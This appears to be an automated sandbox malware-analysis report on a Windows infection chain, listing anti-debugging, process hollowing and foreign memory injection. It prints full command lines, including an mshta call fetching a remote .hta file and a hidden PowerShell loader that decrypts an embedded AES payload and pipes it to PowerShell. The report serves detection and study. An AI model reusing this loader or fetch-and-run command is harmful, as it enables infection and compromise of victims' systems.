Source: C:\Users\user\AppData\Roaming\uc.exe

Code function: 19_2_02997AC0 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary,

19_2_02997AC0

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\Public\Libraries\bwsiuvcU.pif

Code function: 23_2_0040ADB0 GetProcessHeap,HeapFree,

23_2_0040ADB0

Enables debug privileges

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 23_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	23_2_0040CE09
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 23_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	23_2_0040E61C
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 23_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	23_2_00416F6A
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 23_2_004123F1 SetUnhandledExceptionFilter,	23_2_004123F1
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 23_1_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	23_1_0040CE09
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 23_1_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	23_1_0040E61C
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 23_1_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	23_1_00416F6A
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 23_1_004123F1 SetUnhandledExceptionFilter,	23_1_004123F1
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 25_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	25_2_0040CE09
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 25_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	25_2_0040E61C
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 25_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	25_2_00416F6A
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 25_2_004123F1 SetUnhandledExceptionFilter,	25_2_004123F1

Source: C:\Users\Public\Libraries\bwsiuvcU.pif

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Users\user\AppData\Roaming\uc.exe	Memory allocated: C:\Users\Public\Libraries\bwsiuvcU.pif base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Memory allocated: C:\Users\Public\Libraries\bwsiuvcU.pif base: 1E090000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Memory allocated: C:\Users\Public\Libraries\bwsiuvcU.pif base: 400000 protect: page execute and read and write
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Memory allocated: C:\Users\Public\Libraries\bwsiuvcU.pif base: 121D0000 protect: page execute and read and write
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Memory allocated: C:\Users\Public\Libraries\bwsiuvcU.pif base: 400000 protect: page execute and read and write
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Memory allocated: C:\Users\Public\Libraries\bwsiuvcU.pif base: 1E090000 protect: page execute and read and write

Sample uses process hollowing technique

Source: C:\Users\user\AppData\Roaming\uc.exe	Section unmapped: C:\Users\Public\Libraries\bwsiuvcU.pif base address: 400000	Jump to behavior
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Section unmapped: C:\Users\Public\Libraries\bwsiuvcU.pif base address: 400000
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Section unmapped: C:\Users\Public\Libraries\bwsiuvcU.pif base address: 400000

Writes to foreign memory regions

Source: C:\Users\user\AppData\Roaming\uc.exe	Memory written: C:\Users\Public\Libraries\bwsiuvcU.pif base: 2A5008	Jump to behavior
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Memory written: C:\Users\Public\Libraries\bwsiuvcU.pif base: 211008
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Memory written: C:\Users\Public\Libraries\bwsiuvcU.pif base: 239008

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://www.sessosesso.it/assets/aw/yt.hta	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $OsFNkdw = 'AAAAAAAAAAAAAAAAAAAAAOeGa50V5wUO7zHydkcFZbJINq4P3H3RMsqOZX56v9Ct1bZUtRZkWxrChczJINV9leAt1ry1WLWkiFuSzfzQFE/yWmqaDZXsneytUPY+5le4m5eM4W+YWzERSnn/urcy8+ZTG58q1h/+BzdOb3w2O1z7QWzthSNzGxOWWNyV7TmYXZCKVR/W4Wq5ilvQCut+dsc1oHeaxo3nDd5I7/VZnRBIlxsN6HcNAACtlxfRiNFMSkDcN8+7W2lqhnFd5fXX+lgvrRG0ld6mdkV9WDBX6QjfiDRmhCmcLWUj1Bf5MNMwFNO28V0dG8tS2l8mIOdvR6aZF2v7aj+0KYrMlbdDhYWFi7OKVRA/3XZLlb5bbQDQE0oOT0JAi3+7gTkWesgJWCHgEueWTWqAMCB6A7qRzrsbpayqU/WAl9/nKC9cB9JhUjr2ITV9Ek3kErAD+eAPojoNd7bQuKjVE9tLoDwyPKo7YLWXTQF8wgZm0Ja3MfKMwkGLjtfBjT7ucygj4kLX/Zk01swB2YhhmuTYGe58LHZYGFngyyCQTKG4k9tN5i5bStEsFZehOTKeivaD+CKVo0hL0r5uz5GQB2ew8dGCUwkPmeXZvkk4B1gaPU3SmBdkVfrvuhGsjc5t6HhSZTvvp6Jz9v2fJj6ahm37dhgqwqsOIhz9dfUsra5c/+Avs0Ho38MGy4FjkP6OU6wM3P9BykwtvTRUlAfl604CotxxEOc6gE6TRnaarDiD6zmwY1sYkKEtTlG2JS0b7n2FWA1GsA==';$JIfveZK = 'cFRkUGZlWWl4R2ZHdlp1WlRocFlZR3RFVUtmamhETUc=';$UGIWRBAh = New-Object 'System.Security.Cryptography.AesManaged';$UGIWRBAh.Mode = [System.Security.Cryptography.CipherMode]::ECB;$UGIWRBAh.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$UGIWRBAh.BlockSize = 128;$UGIWRBAh.KeySize = 256;$UGIWRBAh.Key = [System.Convert]::FromBase64String($JIfveZK);$VpSlE = [System.Convert]::FromBase64String($OsFNkdw);$uBmStTPL = $VpSlE[0..15];$UGIWRBAh.IV = $uBmStTPL;$cLYZAvcnc = $UGIWRBAh.CreateDecryptor();$eVtPpVFwq = $cLYZAvcnc.TransformFinalBlock($VpSlE, 16, $VpSlE.Length - 16);$UGIWRBAh.Dispose();$DaRjcu = New-Object System.IO.MemoryStream( , $eVtPpVFwq );$wDjFzJY = New-Object System.IO.MemoryStream;$MtMSBjEhy = New-Object System.IO.Compression.GzipStream $DaRjcu, ([IO.Compression.CompressionMode]::Decompress);$MtMSBjEhy.CopyTo( $wDjFzJY );$MtMSBjEhy.Close();$DaRjcu.Close();[byte[]] $dVtmfGSE = $wDjFzJY.ToArray();$ghWDGW = [System.Text.Encoding]::UTF8.GetString($dVtmfGSE);$ghWDGW \| powershell -	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Roaming\uc.exe "C:\Users\user\AppData\Roaming\uc.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Process created: C:\Users\Public\Libraries\bwsiuvcU.pif C:\Users\Public\Libraries\bwsiuvcU.pif	Jump to behavior
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process created: C:\Users\Public\Libraries\bwsiuvcU.pif C:\Users\Public\Libraries\bwsiuvcU.pif
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process created: C:\Users\Public\Libraries\bwsiuvcU.pif C:\Users\Public\Libraries\bwsiuvcU.pif

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop $osfnkdw = 'aaaaaaaaaaaaaaaaaaaaaoega50v5wuo7zhydkcfzbjinq4p3h3rmsqozx56v9ct1bzutrzkwxrchczjinv9leat1ry1wlwkifuszfzqfe/ywmqadzxsneytupy+5le4m5em4w+ywzersnn/urcy8+ztg58q1h/+bzdob3w2o1z7qwzthsnzgxowwnyv7tmyxzckvr/w4wq5ilvqcut+dsc1oheaxo3ndd5i7/vznrbilxsn6hcnaactlxfrinfmskdcn8+7w2lqhnfd5fxx+lgvrrg0ld6mdkv9wdbx6qjfidrmhcmclwuj1bf5mnmwfno28v0dg8ts2l8miodvr6azf2v7aj+0kyrmlbddhywfi7okvra/3xzllb5bbqdqe0oot0jai3+7gtkwesgjwchgeuewtwqamcb6a7qrzrsbpayqu/wal9/nkc9cb9jhujr2itv9ek3kerad+eapojond7bqukjve9tlodwypko7ylwxtqf8wgzm0ja3mfkmwkgljtfbjt7ucygj4klx/zk01swb2yhhmutyge58lhzygfngyycqtkg4k9tn5i5bstesfzehotkeivad+ckvo0hl0r5uz5gqb2ew8dgcuwkpmexzvkk4b1gapu3smbdkvfrvuhgsjc5t6hhsztvvp6jz9v2fjj6ahm37dhgqwqsoihz9dfusra5c/+avs0ho38mgy4fjkp6ou6wm3p9bykwtvtrulafl604cotxxeoc6ge6trnaardid6zmwy1sykkettlg2js0b7n2fwa1gsa==';$jifvezk = 'cfrkugzlwwl4r2zhdlp1wlrocflzr3rfvutmamhetuc=';$ugiwrbah = new-object 'system.security.cryptography.aesmanaged';$ugiwrbah.mode = [system.security.cryptography.ciphermode]::ecb;$ugiwrbah.padding = [system.security.cryptography.paddingmode]::zeros;$ugiwrbah.blocksize = 128;$ugiwrbah.keysize = 256;$ugiwrbah.key = [system.convert]::frombase64string($jifvezk);$vpsle = [system.convert]::frombase64string($osfnkdw);$ubmsttpl = $vpsle[0..15];$ugiwrbah.iv = $ubmsttpl;$clyzavcnc = $ugiwrbah.createdecryptor();$evtppvfwq = $clyzavcnc.transformfinalblock($vpsle, 16, $vpsle.length - 16);$ugiwrbah.dispose();$darjcu = new-object system.io.memorystream( , $evtppvfwq );$wdjfzjy = new-object system.io.memorystream;$mtmsbjehy = new-object system.io.compression.gzipstream $darjcu, ([io.compression.compressionmode]::decompress);$mtmsbjehy.copyto( $wdjfzjy );$mtmsbjehy.close();$darjcu.close();[byte[]] $dvtmfgse = $wdjfzjy.toarray();$ghwdgw = [system.text.encoding]::utf8.getstring($dvtmfgse);$ghwdgw \| powershell -
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop $osfnkdw = 'aaaaaaaaaaaaaaaaaaaaaoega50v5wuo7zhydkcfzbjinq4p3h3rmsqozx56v9ct1bzutrzkwxrchczjinv9leat1ry1wlwkifuszfzqfe/ywmqadzxsneytupy+5le4m5em4w+ywzersnn/urcy8+ztg58q1h/+bzdob3w2o1z7qwzthsnzgxowwnyv7tmyxzckvr/w4wq5ilvqcut+dsc1oheaxo3ndd5i7/vznrbilxsn6hcnaactlxfrinfmskdcn8+7w2lqhnfd5fxx+lgvrrg0ld6mdkv9wdbx6qjfidrmhcmclwuj1bf5mnmwfno28v0dg8ts2l8miodvr6azf2v7aj+0kyrmlbddhywfi7okvra/3xzllb5bbqdqe0oot0jai3+7gtkwesgjwchgeuewtwqamcb6a7qrzrsbpayqu/wal9/nkc9cb9jhujr2itv9ek3kerad+eapojond7bqukjve9tlodwypko7ylwxtqf8wgzm0ja3mfkmwkgljtfbjt7ucygj4klx/zk01swb2yhhmutyge58lhzygfngyycqtkg4k9tn5i5bstesfzehotkeivad+ckvo0hl0r5uz5gqb2ew8dgcuwkpmexzvkk4b1gapu3smbdkvfrvuhgsjc5t6hhsztvvp6jz9v2fjj6ahm37dhgqwqsoihz9dfusra5c/+avs0ho38mgy4fjkp6ou6wm3p9bykwtvtrulafl604cotxxeoc6ge6trnaardid6zmwy1sykkettlg2js0b7n2fwa1gsa==';$jifvezk = 'cfrkugzlwwl4r2zhdlp1wlrocflzr3rfvutmamhetuc=';$ugiwrbah = new-object 'system.security.cryptography.aesmanaged';$ugiwrbah.mode = [system.security.cryptography.ciphermode]::ecb;$ugiwrbah.padding = [system.security.cryptography.paddingmode]::zeros;$ugiwrbah.blocksize = 128;$ugiwrbah.keysize = 256;$ugiwrbah.key = [system.convert]::frombase64string($jifvezk);$vpsle = [system.convert]::frombase64string($osfnkdw);$ubmsttpl = $vpsle[0..15];$ugiwrbah.iv = $ubmsttpl;$clyzavcnc = $ugiwrbah.createdecryptor();$evtppvfwq = $clyzavcnc.transformfinalblock($vpsle, 16, $vpsle.length - 16);$ugiwrbah.dispose();$darjcu = new-object system.io.memorystream( , $evtppvfwq );$wdjfzjy = new-object system.io.memorystream;$mtmsbjehy = new-object system.io.compression.gzipstream $darjcu, ([io.compression.compressionmode]::decompress);$mtmsbjehy.copyto( $wdjfzjy );$mtmsbjehy.close();$darjcu.close();[byte[]] $dvtmfgse = $wdjfzjy.toarray();$ghwdgw = [system.text.encoding]::utf8.getstring($dvtmfgse);$ghwdgw \| powershell -			Jump to behavior

Source: bwsiuvcU.pif, 00000017.00000002.1680679015.000000003DE6A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR
Source: bwsiuvcU.pif, 00000017.00000002.1680679015.000000003DE6A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: bwsiuvcU.pif, 00000017.00000002.1680679015.000000003DE6A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: q8<b>[ Program Manager]</b> (24/04/2024 13:36:37)<br>{Win}TH
Source: bwsiuvcU.pif, 00000017.00000002.1680679015.000000003DE6A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: q9<b>[ Program Manager]</b> (24/04/2024 13:36:37)<br>{Win}rTH
Source: bwsiuvcU.pif, 00000017.00000002.1680679015.000000003DE6A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Managert-
Source: bwsiuvcU.pif, 00000017.00000002.1680679015.000000003DE6A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: q3<b>[ Program Manager]</b> (24/04/2024 13:36:37)<br>

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\AppData\Roaming\uc.exe	Code function: InetIsOffline,CoInitialize,CoUninitialize,WinExec,WinExec,RtlMoveMemory,GetCurrentProcess,EnumSystemLocalesA,ExitProcess,	19_2_0299D5D0
Source: C:\Users\user\AppData\Roaming\uc.exe	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,	19_2_02985A90
Source: C:\Users\user\AppData\Roaming\uc.exe	Code function: GetLocaleInfoA,	19_2_0298A780
Source: C:\Users\user\AppData\Roaming\uc.exe	Code function: GetLocaleInfoA,	19_2_0298A7CC
Source: C:\Users\user\AppData\Roaming\uc.exe	Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,	19_2_02985B9C
Source: C:\Users\user\AppData\Roaming\uc.exe	Code function: InetIsOffline,CoInitialize,CoUninitialize,WinExec,WinExec,RtlMoveMemory,GetCurrentProcess,EnumSystemLocalesA,ExitProcess,	19_2_0299D5D0
Source: C:\Users\user\AppData\Roaming\uc.exe	Code function: GetCurrentProcess,EnumSystemLocalesA,ExitProcess,	19_2_029A5FA0
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: GetLocaleInfoA,	23_2_00417A20
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: GetLocaleInfoA,	23_1_00417A20
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Code function: WinExec,WinExec,RtlMoveMemory,GetCurrentProcess,EnumSystemLocalesA,ExitProcess,	24_2_028BD5D0
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	24_2_028A5A90
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Code function: GetLocaleInfoA,	24_2_028AA7CC
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	24_2_028A5B9B
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Code function: GetCurrentProcess,EnumSystemLocalesA,ExitProcess,	24_2_028C5F9F
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: GetLocaleInfoA,	25_2_00417A20

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
